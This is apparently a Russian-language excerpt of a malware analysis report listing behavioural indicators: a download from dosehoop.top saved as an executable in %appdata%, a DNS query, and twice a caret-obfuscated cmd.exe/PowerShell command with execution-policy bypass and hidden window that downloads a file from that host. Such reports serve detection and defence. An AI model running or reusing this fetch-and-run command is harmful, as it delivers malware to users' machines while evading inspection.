Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^w^E^Rsh^ELl.eXE ^-EX^E^CUtIoNp^Oli^CY^ bYpaSS^ ^-nOProFiL^E^ -wInDO^WStyLe^ H^IDDE^N (NEw-^ObjEct Sys^tE^M.^N^et.^webc^lIE^NT).DownLoaD^fi^Le('http://dosehoop.top/read.ph...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "pO^w^E^Rsh^ELl.eXE ^-EX^E^CUtIoNp^Oli^CY^ bYpaSS^ ^-nOProFiL^E^ -wInDO^WStyLe^ H^IDDE^N (NEw-^ObjEct Sys^tE^M.^N^et.^webc^lIE^NT).DownLoaD^fi^Le('http://dosehoop.top/read.ph...' (со скрытым окном)